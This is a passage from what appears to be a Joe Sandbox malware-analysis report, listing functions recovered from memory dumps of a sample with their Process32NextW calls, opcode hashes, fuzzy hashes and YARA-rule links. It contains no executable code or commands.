                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 466747ce17f97bed56683cd49fb80bb57f19760bcbc7b8be5709dfba4c5449f3
                                                            • Instruction ID: c19041d4e8ceef9d854d138c9737a4c7382935a3c88547e684c7da356a59aff4
                                                            • Opcode Fuzzy Hash: 466747ce17f97bed56683cd49fb80bb57f19760bcbc7b8be5709dfba4c5449f3
                                                            • Instruction Fuzzy Hash: 0E4118EB24D131BDB28280466F65EFB6B2EE1D6730731C42BF807D6542EA844B4E51B1
                                                            Function 06F30217 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 36e67797007e017aa94dd587a5ebbdf7e332f354580fab5744d3c48ec66ffcfb
                                                            • Instruction ID: 9bcadd4b5c38ee1859c98fd4a65b197d38a9de0173c72b992d11412679de75a5
                                                            • Opcode Fuzzy Hash: 36e67797007e017aa94dd587a5ebbdf7e332f354580fab5744d3c48ec66ffcfb
                                                            • Instruction Fuzzy Hash: 1B3119EB24D131BEB38290466F65EFB6B2EE2D6730730C42BF407D6542EA844B4E51B1
                                                            Function 06F30242 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 0dd07d3a2374ac083d9c64254093bcd521fb7ed08b45f83ccc571ee6693913e1
                                                            • Instruction ID: 7490c51327afba4316391b032e7f349a6ee03e8215f5c8c68d737f380300ad05
                                                            • Opcode Fuzzy Hash: 0dd07d3a2374ac083d9c64254093bcd521fb7ed08b45f83ccc571ee6693913e1
                                                            • Instruction Fuzzy Hash: 323139EB24D131BEB38291456F65EFB6B2EE1D6730730C42BF807D6542EA844B4E51B1
                                                            Function 06F30211 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 5777007a15464447bb794ce746b2ecec85e8cc31ab4f391d8bcc099b9e5e26a3
                                                            • Instruction ID: 3de4a82b8863a94741d976a237ced1d14784140f71538a845f1b503fc5b84453
                                                            • Opcode Fuzzy Hash: 5777007a15464447bb794ce746b2ecec85e8cc31ab4f391d8bcc099b9e5e26a3
                                                            • Instruction Fuzzy Hash: 02313AEB24D131BEB39281456F65EFB6B2EE1D6730731C42BF407C6542EA844B4E51B1
                                                            Function 06F30292 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: a3f54857a8417789a511de9e0e7006c7b7fea0bc6eb7f0208e0ad5810d44d222
                                                            • Instruction ID: fd680ef51009148ce9b2ddbda7d86be0505caa3c1116a3b69f8b688a321229ac
                                                            • Opcode Fuzzy Hash: a3f54857a8417789a511de9e0e7006c7b7fea0bc6eb7f0208e0ad5810d44d222
                                                            • Instruction Fuzzy Hash: D52106EB24D031BEB38690456F65EFA676EE1DA730730C42BB407D6542EA844B4A11F1
                                                            Function 06F302EE Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: a78c3e35000a63e62ad991e26f9c78ebb0a5377bd0954288710c8c85f38e5f6b
                                                            • Instruction ID: 16bda5b6d0d7e3b851caf45b395c24e61a44db9f155a951dc9a04086fe145513
                                                            • Opcode Fuzzy Hash: a78c3e35000a63e62ad991e26f9c78ebb0a5377bd0954288710c8c85f38e5f6b
                                                            • Instruction Fuzzy Hash: 69318EEB24E031BEB38291456F55EFB6B2EE1E6730730842BF407D6542EA844B4A41F1
                                                            Function 06F302AA Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: a9be2eea46b203e14561367f596c17e4edf6029702a28cd82fbaf65e469ba19e
                                                            • Instruction ID: c453531232376bb9e6c8bfe178a34bdade0c39eacc1e7d6de11363ceb8d1f9f1
                                                            • Opcode Fuzzy Hash: a9be2eea46b203e14561367f596c17e4edf6029702a28cd82fbaf65e469ba19e
                                                            • Instruction Fuzzy Hash: 50213BEB24E031BEB39294456F55EFA672EE1EA770730C42BF407C6542EA844F8A10F1
                                                            Function 06F302D8 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4a7f635faea141cfb271248bfe18d79d86a36a68a1e47cf401df06e202a27613
                                                            • Instruction ID: d5c367645ace46571bcbf69d44c14f76c28b59c6298760582ce00723a21c7613
                                                            • Opcode Fuzzy Hash: 4a7f635faea141cfb271248bfe18d79d86a36a68a1e47cf401df06e202a27613
                                                            • Instruction Fuzzy Hash: CA218CE724E031BEB3C690596F51EFB275EE1EA730330C42BB407C6582EA844A8A00F5
                                                            Function 06F30322 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: c1d091f5de23bff4d914b5b5aa54b785f339edd0bbe27ae79f541c2f0d5e2bc0
                                                            • Instruction ID: a911755b69618b452a5c91c758232c060283338af4db80e2e61600de0edf2a04
                                                            • Opcode Fuzzy Hash: c1d091f5de23bff4d914b5b5aa54b785f339edd0bbe27ae79f541c2f0d5e2bc0
                                                            • Instruction Fuzzy Hash: F0216AE724E131BEB3C2D459AE51EFA276EE5E6730730C42BF407C6442EA841A8A10F1
                                                            Function 06F30310 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: c5215e00e058175781e73e66c3ad22206586b22898d7f1540a31b3fe40d3ba52
                                                            • Instruction ID: 506e78e4f8ffb751d6aad4e54370c93f80d17674ca01dc3c8a312336acce1597
                                                            • Opcode Fuzzy Hash: c5215e00e058175781e73e66c3ad22206586b22898d7f1540a31b3fe40d3ba52
                                                            • Instruction Fuzzy Hash: 1A112EE724E071BEB3C290596E51EFA171EE5E6730730C52BF447C6542EA844B4A10F1
                                                            Function 06F30343 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 88dbe33f6ac6edfd21e4b083aacc2ac2ff089b8369e85f706d01071ecd089790
                                                            • Instruction ID: dc94f458181390b1134d53cf60c807777b18ad4525f10e3a1fab904839ba4c7e
                                                            • Opcode Fuzzy Hash: 88dbe33f6ac6edfd21e4b083aacc2ac2ff089b8369e85f706d01071ecd089790
                                                            • Instruction Fuzzy Hash: ED11E8E721E135BE73C2D1566F51EFA272DE1E6730730C42BB406C6542EA850B9910F6
                                                            Function 06ED0C11 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: E
                                                            • API String ID: 0-3568589458
                                                            • Opcode ID: 3690b06d4d40a6358ed0f5f5385fe044d04b8885075d2e26acdadeac2a4767db
                                                            • Instruction ID: 767234555a92c473260ec9b4b56ca8bf0c6a7cd359978dbe2a2228ad4982a079
                                                            • Opcode Fuzzy Hash: 3690b06d4d40a6358ed0f5f5385fe044d04b8885075d2e26acdadeac2a4767db
                                                            • Instruction Fuzzy Hash: F641B1E720C314BDB3C2D9826B54AFB666EE6DA730F38A427F807D5502E2951F4B10B1
                                                            Function 06ED0A20 Relevance: .4, Instructions: 386COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 51422c4808b2568f2843080f49762837f66d88d79479e5cea083777c57424d8f
                                                            • Instruction ID: 3e604220f691eb3f30b395e5dc47518c3a806493a902243e6843bcb71b40651d
                                                            • Opcode Fuzzy Hash: 51422c4808b2568f2843080f49762837f66d88d79479e5cea083777c57424d8f
                                                            • Instruction Fuzzy Hash: 0D71B6EB14C314BDB2C2D9866B54AFA672EE1D6730F38B427F807D9546E2940F8B10B1
                                                            Function 06ED0A75 Relevance: .3, Instructions: 328COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd221b85768edc7bc095dbf7f0cc589fed499f178a9a217a49b7e10e7718ba98
                                                            • Instruction ID: a5417e904183eb3a8019b7e8ed2a25f6b713e2855f155387578b62f9ae70f456
                                                            • Opcode Fuzzy Hash: dd221b85768edc7bc095dbf7f0cc589fed499f178a9a217a49b7e10e7718ba98
                                                            • Instruction Fuzzy Hash: 0351A6EB14D314BDB7C289826B54AFB572EE2DA730F38A427F807D9646D2941F4B10B1
                                                            Function 06ED0AB4 Relevance: .3, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05a99421d850a57c8e17949889a2851246e7da96925e33986a449f44f4b5e566
                                                            • Instruction ID: 91afc2005a22b6d19e565b3a6ecf85de3a2f6c7fc1e4d5352c2c06d4908761b7
                                                            • Opcode Fuzzy Hash: 05a99421d850a57c8e17949889a2851246e7da96925e33986a449f44f4b5e566
                                                            • Instruction Fuzzy Hash: 2151E5EB14D314BDB3C2C9426B54AFA672EE6DA730F38A427F807D9646D2940F4B10B1
                                                            Function 06ED0A70 Relevance: .3, Instructions: 321COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bc3a22fdcd978dc270be3580794fd57d0611d30a1b75acdd9e902edc6b8c48f
                                                            • Instruction ID: 346bcc6a45affff403be88f12531132c3f043c3341992907bcdd4d4dd7ba2a24
                                                            • Opcode Fuzzy Hash: 9bc3a22fdcd978dc270be3580794fd57d0611d30a1b75acdd9e902edc6b8c48f
                                                            • Instruction Fuzzy Hash: 5951A5EB14C314BDB3C289466B54AFB572EE2DA730F38A427F807D9646D2941F4B10B1
                                                            Function 06ED0AA3 Relevance: .3, Instructions: 312COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48bb0bb400260963789c8d86437b356f3ee0ed3ec618cc28313b0737e09083dc
                                                            • Instruction ID: e1576cc38b4e9156eb94deede636bad8b60b27fc916e5dc8b08264861f2c1cae
                                                            • Opcode Fuzzy Hash: 48bb0bb400260963789c8d86437b356f3ee0ed3ec618cc28313b0737e09083dc
                                                            • Instruction Fuzzy Hash: BA51B6EB14C314BDB7C289426B54AFA672EE2DA730F38A427F817D9646D2941F4B10B1
                                                            Function 06ED0B88 Relevance: .3, Instructions: 311COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8c713f84420d3e80d72c8ab6b0fe5eea083b8f0bf5630df17a5449040a06e34
                                                            • Instruction ID: 735d0d634c0fe7cda503cfe9e61a27d3959b5db3c288a730b18f2eb917d13677
                                                            • Opcode Fuzzy Hash: f8c713f84420d3e80d72c8ab6b0fe5eea083b8f0bf5630df17a5449040a06e34
                                                            • Instruction Fuzzy Hash: B451F4EB14D314BDB3C2C9426B54AFA6B2DE6DA730B38A427F807D9546E2941F4B10B1
                                                            Function 06ED0B29 Relevance: .3, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15276d827f7f0b383dbe9148c6cfeff7d2907062ead421f0cf546586543f888b
                                                            • Instruction ID: 2d2170f0ba3fda4591ef180d85d2a1c92e4f00bceb24fd59c912b050c3a53840
                                                            • Opcode Fuzzy Hash: 15276d827f7f0b383dbe9148c6cfeff7d2907062ead421f0cf546586543f888b
                                                            • Instruction Fuzzy Hash: F151D7E714C314BDB38299416B54AFB672DE6DA730F38A427F807DA546D2941F4B10B1
                                                            Function 06ED0B06 Relevance: .3, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f1f139092b86a25225748f0e5fe45775e3c05bb0aecaeedee43f9fc51d5e3af
                                                            • Instruction ID: f7073346ccca4de782abe83f3b369ac0701ca2ef8347bfcaa119f966d0aa1ddd
                                                            • Opcode Fuzzy Hash: 8f1f139092b86a25225748f0e5fe45775e3c05bb0aecaeedee43f9fc51d5e3af
                                                            • Instruction Fuzzy Hash: E251B5EB14C314BDB7C299426B54AFB672EE2DA730F38A427F807D5646D2941F4B10B1
                                                            Function 06ED0BC8 Relevance: .3, Instructions: 291COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e1014ffba54a54c063973912796f7fce9c68bf2f52ec3c47a4043147338847a
                                                            • Instruction ID: d3ef2ca3062995333d82a0852e15be03fa739c3e2bb759498dae8a138b7d1a5b
                                                            • Opcode Fuzzy Hash: 7e1014ffba54a54c063973912796f7fce9c68bf2f52ec3c47a4043147338847a
                                                            • Instruction Fuzzy Hash: 4951F7EB14C314BDB7C2C9426B54AFB6B2DE6D6730B38A427F807D9506E2941F4B50B1
                                                            Function 06ED0B13 Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1648c0ec4dcb17d45f8f612760ef9cff2140ab20abb6a763cb7e98c79ef2ed0a
                                                            • Instruction ID: 66c15ccb124ee4b16bd8faaebdd62bacec3df70a6795f52049ecbebc6a9748b9
                                                            • Opcode Fuzzy Hash: 1648c0ec4dcb17d45f8f612760ef9cff2140ab20abb6a763cb7e98c79ef2ed0a
                                                            • Instruction Fuzzy Hash: 3D5194EB14C314BDB7C299426B54AFA672EE2DA730F38A427F807D5646E3941F4B10B1
                                                            Function 06ED0B59 Relevance: .3, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35b0d8ae76998756d9ce2b342e569fe957f83c2c02329d6573f5c592f9623865
                                                            • Instruction ID: bee20205763b196f1876728f455f8cbb5d3b2267919555b89b2f48a11b4212a8
                                                            • Opcode Fuzzy Hash: 35b0d8ae76998756d9ce2b342e569fe957f83c2c02329d6573f5c592f9623865
                                                            • Instruction Fuzzy Hash: C251E6EB14C310BDB7C289426B54AFB672EE2DA730F38A427F807D9546E2951F4B10B1
                                                            Function 06ED0B74 Relevance: .3, Instructions: 273COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6dbcefa6c9738216e84e385640d7e389739e1463dc46412f939c37a419288220
                                                            • Instruction ID: 629e9d762db5ec45597e44ac26d530e84f6bb38c9bfb29802cdee3a5e1d71bdf
                                                            • Opcode Fuzzy Hash: 6dbcefa6c9738216e84e385640d7e389739e1463dc46412f939c37a419288220
                                                            • Instruction Fuzzy Hash: 9851B5EB14C314BDB7C299426B54AFB672EE2DA730F38A427F807D9606D2951F4B10B1
                                                            Function 06ED0BB8 Relevance: .3, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5f37106e897b7861cd07dc3825958f2a0a99f0f68b81a9e04bf07f7b4b471919
                                                            • Instruction ID: 4ea237aaa7590708cc23353a57419ce9141c85dbafad38e87cd2a29587af7a5f
                                                            • Opcode Fuzzy Hash: 5f37106e897b7861cd07dc3825958f2a0a99f0f68b81a9e04bf07f7b4b471919
                                                            • Instruction Fuzzy Hash: 014183EB14C314BDB3C299426B54AFB672EE2DA730B38A427F807D9546D2951F4B10B1
                                                            Function 06ED0BEF Relevance: .2, Instructions: 244COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dcaf084f9a3c2247231aa981339b9a2241e36775a97a8d2ffd081bdab8ebaea1
                                                            • Instruction ID: ce74e169ce1f365043aa742532321cd2c6688f774779a97468d47a741e8c9497
                                                            • Opcode Fuzzy Hash: dcaf084f9a3c2247231aa981339b9a2241e36775a97a8d2ffd081bdab8ebaea1
                                                            • Instruction Fuzzy Hash: 3041B6E714C314BDB7C2D9826B54AFA672EE2DA730F38A427F807D9502E2951F4B50B1
                                                            Function 06ED0C06 Relevance: .2, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e040c0d83a910776fed3c5ac59c35e68eef36cb41143fc5cbccef9b212f5f810
                                                            • Instruction ID: 657ba342f6da6c3e75f67ec1cf46cbacda464a9dd567d2e3d162c79ad3c90eaa
                                                            • Opcode Fuzzy Hash: e040c0d83a910776fed3c5ac59c35e68eef36cb41143fc5cbccef9b212f5f810
                                                            • Instruction Fuzzy Hash: 344184E714C314BDB7C299866B54AFA672EE2D6730F38A427F807D9502D2951F4B10B1
                                                            Function 06ED0CB5 Relevance: .2, Instructions: 236COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6660bc1b25116f009bce6011b2e03a3913f4268825e2df1086742827cd331f9b
                                                            • Instruction ID: 156378d2fde5409f79f9483a76393c7630b980be075aff3003d59ba693816ee0
                                                            • Opcode Fuzzy Hash: 6660bc1b25116f009bce6011b2e03a3913f4268825e2df1086742827cd331f9b
                                                            • Instruction Fuzzy Hash: EC4190EB20C314BDB6C2D9466B54AFB672EE2DA730F38A427F807D9502D2951F4B10B1
                                                            Function 06ED0C44 Relevance: .2, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 407d6bfd7c78ff90d933a3b8736c22d0d1b42a1523ce30b37d488eba8656d901
                                                            • Instruction ID: 82595a12abe923cf3df1aa74102aee1d1f74f301c5c493b69016a018d251a65f
                                                            • Opcode Fuzzy Hash: 407d6bfd7c78ff90d933a3b8736c22d0d1b42a1523ce30b37d488eba8656d901
                                                            • Instruction Fuzzy Hash: 984192E720C314BDB6C299466B54AFB672EE2DA730F38A427F807D9502E2951F4B10B5
                                                            Function 06ED0C39 Relevance: .2, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ed0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d9a2256bcb63fedc2fa123c7b0702b74929b04a80975cee83d9c08956c34adc1
                                                            • Instruction ID: 105c5ef000d1cefb70f4c8a5dbd107b10455b24a017173933552e20c0aa9250a
                                                            • Opcode Fuzzy Hash: d9a2256bcb63fedc2fa123c7b0702b74929b04a80975cee83d9c08956c34adc1
                                                            • Instruction Fuzzy Hash: EC4181E724C314BDB7C299426B54AFB672EE2DA730F38A427F807D5602E2951F4B10B1
                                                            Function 06ED0C58 Relevance: .2, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416564966.0000000006ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
